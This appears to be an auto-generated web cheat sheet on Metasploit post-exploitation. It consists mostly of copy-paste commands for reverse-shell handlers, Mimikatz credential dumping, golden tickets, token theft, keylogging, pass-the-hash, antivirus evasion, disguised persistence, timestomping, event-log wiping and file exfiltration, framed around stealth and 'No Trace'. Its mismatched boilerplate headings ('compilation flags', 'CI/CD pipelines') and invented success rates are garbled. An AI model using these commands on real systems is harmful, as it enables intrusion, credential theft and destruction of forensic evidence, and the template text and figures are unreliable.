Metasploit Intermediate Cheat Sheet DATA | Post-Exploit...

Quick Start with metasploit intermediate

Production-ready compilation flags and build commands

Metasploit automation: QUICK START (10s)

Copy → Paste → Live

msfconsole -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST tun0; set LPORT 443; set ExitOnSession false; run -j'

[*] Exploit running as background job 0. Learn more in 'metasploit resource scripts tutorial' section

⚡ 5s Setup

When to Use metasploit intermediate

Decision matrix per scegliere la tecnologia giusta

IDEAL USE CASES

Lateral movement across segmented networks using pivoting and tunneling
Automated credential harvesting and token manipulation in Active Directory environments
Stealthy persistence and antivirus evasion during red team engagements

AVOID FOR

Simple vulnerability scanning (use Nessus/OpenVAS for coverage)
Blindly firing exploits against production servers without 'check'
Denial of Service (DoS) testing on critical infrastructure

Core Concepts of metasploit intermediate

Production-ready compilation flags and build commands

Pivoting and Tunneling: Network Routing

Routing traffic through compromised hosts. See 'how to pivot with metasploit' below

⚠️ Common Error

Forgetting to add route in Meterpreter

✓ Solution

run autoroute -s [SUBNET]

Access to internal subnets

Post-Exploitation Modules: Local Context

Using local modules for enumeration after initial shell.

+80% Recon Speed

Meterpreter Commands: Session Management

Handling multiple sessions and upgrading shells.

Instant shell upgrades

Payload Evasion: Transport Manipulation

Changing communication protocols on the fly (TCP to HTTPS).

⚠️ Common Error

Dropping shell during switch

✓ Solution

Use 'transport add' then 'transport next'

Persistence

Credential Dumping: Kiwi/Mimikatz

Extracting cleartext passwords and Kerberos tickets.

Domain Dominance

metasploit intermediate Code Snippets

Copy-paste ready code blocks with real-world use cases

BASH

Upgrade Shell to Meterpreter

sessions -u [SESSION_ID]

Output

[*] Command shell session 1 closed. [*] Meterpreter session 2 opened.

BASH

Auto-Route Internal Subnet

run autoroute -s 10.10.10.0/24

Output

[*] Added route to 10.10.10.0/255.255.255.0 via ...

BASH

Start SOCKS4a Proxy

use auxiliary/server/socks_proxy; set SRVPORT 9050; set VERSION 4a; run

Output

[*] Starting the SOCKS proxy server

BASH

Port Forwarding (Local)

portfwd add -l 3389 -p 3389 -r [TARGET_IP]

Output

[*] Local TCP relay created: 0.0.0.0:3389 <-> [TARGET]:3389

BASH

Load Kiwi (Mimikatz)

load kiwi

Output

Loading extension kiwi... Success.

BASH

Dump LSA Secrets

lsa_dump_sam

Output

Domain : WORKGROUP...

BASH

Create Golden Ticket

golden_ticket_create -d domain.local -u user -s [SID] -k [KRBTGT_HASH] -t /tmp/gold.ticket

Output

Ticket saved to /tmp/gold.ticket

BASH

Inject Payload into Process

migrate -N lsass.exe

Output

[*] Migrating from 1234 to 5678...

BASH

Timestomp (Anti-Forensics)

timestomp C:\malware.exe -f C:\Windows\notepad.exe

Output

[*] Modified MACE attributes

BASH

Clear Event Logs

clearev

Output

[*] Wiping 450 records from Application...

BASH

Local Exploit Suggester

use post/multi/recon/local_exploit_suggester; set SESSION 1; run

Output

[+] 10.10.10.5 - exploit/windows/local/cve_2020_0796_smbghost returns Yes

BASH

Token Impersonation (Incognito)

load incognito; list_tokens -u

Output

Delegation Tokens Available: NT AUTHORITY\SYSTEM

BASH

Impersonate Token

impersonate_token "NT AUTHORITY\SYSTEM"

Output

[+] Successfully impersonated user

BASH

Run VNC on Target

run vnc

Output

[*] VNC Server started...

BASH

Keylogging

keyscan_start; sleep 30; keyscan_dump

Output

Dump: password123!

BASH

Search Files

search -f *.config

Output

Found: web.config (35KB)

Mastering metasploit intermediate Commands

Production-ready compilation flags and build commands

migrate

Moves session

Full Syntax

migrate [PID] | migrate -N [NAME]

DefaultCurrent process

Alternativerun post/.../migrate

Caveat

⚠️ Arch must match (x64/x86)

autoroute

Updates MSF routing table

Full Syntax

run autoroute -s [SUBNET] -n [MASK]

DefaultN/A

Alternativeroute add

Caveat

⚠️ Only affects MSF traffic

portfwd

Tunnels port locally

Full Syntax

portfwd add -l [LPORT] -p [RPORT] -r [RHOST]

DefaultN/A

Alternativessh -L

Caveat

⚠️ Requires stable session

socks_proxy

SOCKS4a/5 server

Full Syntax

use auxiliary/server/socks_proxy

DefaultPort 1080

Alternativessh -D

Caveat

⚠️ Need proxychains to use

getsystem

Elevates to SYSTEM

Full Syntax

getsystem -t [0-3]

DefaultTry all (0)

Alternativelocal exploit suggester

Caveat

⚠️ Noisy, often flagged

hashdump

SAM/DC hashes

Full Syntax

run post/windows/gather/smart_hashdump

DefaultSAM

Alternativekiwi (mimikatz)

Caveat

⚠️ Requires SYSTEM

transport

Adds resilience

Full Syntax

transport add -t [TYPE] -l [IP] -p [PORT]

DefaultN/A

AlternativeN/A

Caveat

⚠️ Must start listener first

resource

Runs batch commands

Full Syntax

resource [FILE.rc]

DefaultN/A

Alternativemakerc

Caveat

⚠️ Stops on error

search suggest

List of CVEs

Full Syntax

run post/multi/recon/local_exploit_suggester

DefaultAll checks

Alternativemanual enum

Caveat

⚠️ False positives common

timestomp

Matches file times

Full Syntax

timestomp [DEST] -f [SOURCE]

DefaultN/A

AlternativeN/A

Caveat

⚠️ MFT might still show

Production Examples in metasploit intermediate

Real-world applications with measured performance metrics

how to pivot with metasploit: Double Pivot

Depth: 2 Hops

Reaching a deep subnet through two compromised hosts

Build Command

Session 1 (DMZ): `run autoroute -s 10.10.20.0/24` -> Exploit Host B -> Session 2 (Internal): `run autoroute -s 10.10.30.0/24` -> Scan 10.10.30.5

✅ Access to 10.10.30.x

meterpreter privilege escalation guide: Token Impersonation

Time: < 1min

Stealing a Domain Admin token from a print server process

Build Command

load incognito; list_tokens -u; impersonate_token "CORP\DA_User"; getuid

✅ CORP\DA_User

bypassing antivirus with metasploit: In-Memory Injection

Detection: Low

Executing a payload without touching disk using PowerShell

Build Command

use exploit/multi/script/web_delivery; set TARGET 2; set PAYLOAD windows/x64/meterpreter/reverse_https; run

✅ Session established (Diskless)

lateral movement metasploit: PsExec Pass-The-Hash

Success: 100%

Moving laterally using dumped NTLM hashes

Build Command

use exploit/windows/smb/psexec; set RHOSTS 192.168.1.50; set SMBUser Administrator; set SMBPass [HASH]; run

✅ SYSTEM Shell on .50

metasploit database management: Workspace Separation

Risk: Zero crossover

Managing distinct client engagements

Build Command

workspace -a Client_A; db_nmap -sS 10.0.0.0/24; workspace -a Client_B; db_nmap -sS 192.168.0.0/24

✅ Data Isolated

Persistent Backdoor: Registry RunKey

Reboot: Survived

Creating a stealthy registry persistence mechanism

Build Command

run post/windows/manage/persistence_exe EXE_NAME=update.exe REG_NAME=WindowsUpdate

✅ Registry Key Added

Common Production Fixes for metasploit intermediate

Production-tested solutions for common errors (2500+ cases resolved)

Meterpreter session died (Reason: Died)

30%

Context

Network instability or AV killed process

Production Fix

Migrate immediately upon connection (`set AutoRunScript post/windows/manage/migrate`)

Verification✅ ✅ Stable Session

Status

Production-tested solution

Operation failed: The token contains no privileges

25%

Context

Running `getsystem` or `hashdump` as unprivileged user

Production Fix

Run local exploit suggester first to elevate privileges before dumping.

Verification✅ ✅ Admin Privs

Status

Production-tested solution

Exploit failed: The target is not vulnerable

40%

Context

Patch levels or OS mismatch

Production Fix

Verify target architecture and OS version exactly. Use `check` command.

Verification✅ ✅ Vulnerable

Status

Production-tested solution

Port forwarding failed

15%

Context

Permission denied or port in use locally

Production Fix

Run msfconsole with sudo or choose high port (>1024) for local bind.

Verification✅ ✅ Tunnel Open

Status

Production-tested solution

SOCKS proxy connection timed out

20%

Context

Routing table missing in Metasploit

Production Fix

Ensure `run autoroute` was executed for the subnet before starting proxychains.

Verification✅ ✅ Traffic Flows

Status

Production-tested solution

metasploit intermediate Common Pitfalls & Fixes

Using 32-bit payloads on 64-bit systems
Frequency: 50%
Cause: Defaulting to windows/meterpreter/reverse_tcp
5m
Avg fix time
Fix
Always use windows/x64/meterpreter/reverse_tcp for modern servers
✓ ✅ Stability
Forgetting to migrate
Frequency: 70%
Cause: Exploiting browser/office app that user closes
1m
Avg fix time
Fix
Migrate to services.exe or explorer.exe immediately
✓ ✅ Persistence
Running loud discovery modules
Frequency: 40%
Cause: Using arp_sweep or portscan with high threads
N/A
Avg fix time
Fix
Reduce threads (`set THREADS 5`) and add delay
✓ ✅ Stealth
Hashdump fails on Domain Controller
Frequency: 30%
Cause: Trying to dump local SAM instead of NTDS
2m
Avg fix time
Fix
Use `run post/windows/gather/credentials/domain_hashdump`
✓ ✅ NTDS.dit
SOCKS Proxy fails with ICMP
Frequency: 60%
Cause: SOCKS protocol does not support ICMP (Ping)
N/A
Avg fix time
Fix
Use TCP connect scans (`nmap -sT`) only
✓ ✅ Valid Scan
Payload caught by AV
Frequency: 90%
Cause: Using raw `msfvenom` output
10m
Avg fix time
Fix
Use `shikata_ga_nai` iterations (weak) or custom C# loaders (better)
✓ ✅ Evasion
Losing shell on disconnect
Frequency: 40%
Cause: ExitOnSession defaults to true
1m
Avg fix time
Fix
`set ExitOnSession false` in handler
✓ ✅ Multi-Catch
Dirty logs
Frequency: 80%
Cause: Not clearing event logs after heavy activity
30s
Avg fix time
Fix
Run `clearev` before disconnecting
✓ ✅ Forensics
Incorrect LHOST in WAN
Frequency: 30%
Cause: Using internal IP for external reverse shell
5m
Avg fix time
Fix
Use `set LHOST [Public_IP]` and port forward router
✓ ✅ Callback
Kiwi architecture mismatch
Frequency: 20%
Cause: Loading 32-bit kiwi on 64-bit session
2m
Avg fix time
Fix
Migrate to x64 process first
✓ ✅ Loaded

metasploit intermediate Troubleshooting Guide

Common metasploit intermediate errors with root cause analysis and verified fixes

Error: The target machine actively refused it.

Symptom

Connection failed

Root Cause

Payload not running or firewall blocked port

Fix

Check LPORT and verify payload execution on target.

Verification

✓nc -zv [IP] [PORT]

Meterpreter session 1 closed. Reason: Died

Symptom

Session unstable

Root Cause

Network latency or process termination

Fix

Enable `set SessionCommunicationTimeout 0` for long-latency links.

Verification

✓sessions -i

stdapi is not loaded

Symptom

Commands missing

Root Cause

Payload restricted or failed load

Fix

Run `load stdapi` manually in meterpreter console.

Verification

✓help

SOCKS proxy: connection refused

Symptom

Proxychains fails

Root Cause

Route missing or host down

Fix

Verify `route print` in MSF matches target subnet.

Verification

✓run autoroute -p

Kiwi command not found

Symptom

Typo or load failure

Root Cause

Extension not loaded

Fix

`load kiwi` or `load mimikatz` (older versions).

Verification

✓help kiwi

Exploit completed, but no session was created.

Symptom

Silent failure

Root Cause

NAT/Firewall issue or mismatched LHOST

Fix

Use `set LHOST 0.0.0.0` for bind or correct public IP for reverse.

Verification

✓show options

Access denied (during migration)

Symptom

Migration fails

Root Cause

Target process has higher integrity level

Fix

Use `getsystem` first or migrate to process with same user.

Verification

✓getuid

Database not connected

Symptom

Slow search

Root Cause

PostgreSQL service down

Fix

`sudo service postgresql start` && `msfdb init`

Verification

✓db_status

Powershell script execution failed

Symptom

Payload blocked

Root Cause

Execution Policy Restricted

Fix

Use `msfvenom ... -f psh-reflection` or `-f psh-net`.

Verification

✓manual execution

Bind failed: Address already in use

Symptom

Listener error

Root Cause

Port 4444 occupied

Fix

`jobs -k` to kill old listeners or change LPORT.

Verification

✓netstat -antp

Elite Pro Hacks For metasploit intermediate

Advanced performance tips and optimizations for metasploit intermediate

Ghost Transport Migration

Code

transport add -t reverse_https -l [IP] -p 8443; transport next

ImprovementSwaps C2 protocol mid-session

Caveat

⚠️ Requires listener ready

Memory-Only Mimikatz

Code

load kiwi; creds_all

ImprovementNo binary upload needed

Caveat

⚠️ Flagged by EDR

Recursive Autoroute

Code

run post/multi/manage/autoroute

ImprovementAuto-adds routes from all NICs

Caveat

⚠️ Can cause routing loops

Resource Script Automation

Code

msfconsole -r setup_listeners.rc

ImprovementInstant infrastructure setup

Caveat

⚠️ Static config

Smart Hashdump

Code

run post/windows/gather/smart_hashdump

ImprovementChecks privs & extracting method

Caveat

⚠️ Needs SYSTEM

metasploit intermediate Production Workflows

Complete CI/CD pipelines from prototype to production deployment for metasploit intermediate

Pivot & Tunnel

Step 1Session 1 Open

Establish Beachhead

exploit -j (Get Session 1)

✅

Step 2Route Added

Add Route

run autoroute -s 192.168.10.0/24

✅

Step 3Listening on 1080

Start SOCKS

use auxiliary/server/socks_proxy; run

✅

Step 4Scan Results

External Tool

proxychains nmap -sT 192.168.10.5

✅

✓

✅ Internal Access

Domain Domination

Step 1Got SYSTEM

Get System

getsystem

✅

Step 2Kiwi loaded

Load Kiwi

load kiwi

✅

Step 3Admin NTLM

Dump Hashes

creds_all

✅

Step 4Shell on DC

Pass the Hash

psexec (Using Hash)

✅

✓

✅ Domain Admin

Stealth Persistence

Step 1svchost.exe

Generate Payload

msfvenom ... -f exe

✅

Step 2Uploaded

Upload

upload svchost.exe C:\Windows\Temp\

✅

Step 3Scheduled Task Created

Schedule Task

run post/windows/manage/persistence_s4u ...

✅

Step 4MACE matched

Timestomp

timestomp svchost.exe -f calc.exe

✅

✓

✅ Hidden

Data Exfiltration

Step 1Found files

Search

search -f sensitive*docx

✅

Step 2Archive created

Compress

shell -> tar -czf loot.tar.gz ...

✅

Step 3Downloaded

Download

download loot.tar.gz

✅

✓

✅ Loot Secured

Cleanup

Step 1Deleted

Delete Files

rm C:\Windows\Temp\malware.exe

✅

Step 2Routes cleared

Remove Routes

route flush

✅

Step 3Logs Wiped

Clear Logs

clearev

✅

✓

✅ No Trace

⚡ Internal Network Scanning (Pivoting)

Performance Gain

+400% Speed

Baseline

Standard

Time

10 mins (Standard Proxychains Nmap)

Memory

50MB

Throughput

Very Slow (TCP Handshakes)

Optimized

Enhanced

Time

2 mins (Metasploit `portscan` module)

Memory

100MB

Throughput

High (Native Routing)

Overall Gain+400% Speed

🔬

Methodology

Scanning /24 subnet via Meterpreter pivot

On This Page

Quick Start with metasploit intermediate

When to Use metasploit intermediate

IDEAL USE CASES

AVOID FOR

Core Concepts of metasploit intermediate

metasploit intermediate Code Snippets

Mastering metasploit intermediate Commands

migrate

autoroute

portfwd

socks_proxy

getsystem

hashdump

transport

resource

search suggest

timestomp

Production Examples in metasploit intermediate

how to pivot with metasploit: Double Pivot

meterpreter privilege escalation guide: Token Impersonation

bypassing antivirus with metasploit: In-Memory Injection

lateral movement metasploit: PsExec Pass-The-Hash

metasploit database management: Workspace Separation

Persistent Backdoor: Registry RunKey

Common Production Fixes for metasploit intermediate

Meterpreter session died (Reason: Died)

Operation failed: The token contains no privileges

Exploit failed: The target is not vulnerable

Port forwarding failed

SOCKS proxy connection timed out

metasploit intermediate Common Pitfalls & Fixes

Using 32-bit payloads on 64-bit systems

Forgetting to migrate

Running loud discovery modules

Hashdump fails on Domain Controller

SOCKS Proxy fails with ICMP

Payload caught by AV

Losing shell on disconnect

Dirty logs

Incorrect LHOST in WAN

Kiwi architecture mismatch

metasploit intermediate Troubleshooting Guide

Error: The target machine actively refused it.

Meterpreter session 1 closed. Reason: Died

stdapi is not loaded

SOCKS proxy: connection refused

Kiwi command not found

Exploit completed, but no session was created.

Access denied (during migration)

Database not connected

Powershell script execution failed

Bind failed: Address already in use

Elite Pro Hacks For metasploit intermediate

Ghost Transport Migration

Memory-Only Mimikatz

Recursive Autoroute

Resource Script Automation

Smart Hashdump

metasploit intermediate Production Workflows

Pivot & Tunnel

Establish Beachhead

Add Route

Start SOCKS

External Tool

Domain Domination

Get System

Load Kiwi

Dump Hashes

Pass the Hash

Stealth Persistence

Generate Payload

Upload

Schedule Task

Timestomp

Data Exfiltration

Search

Compress

Download

Cleanup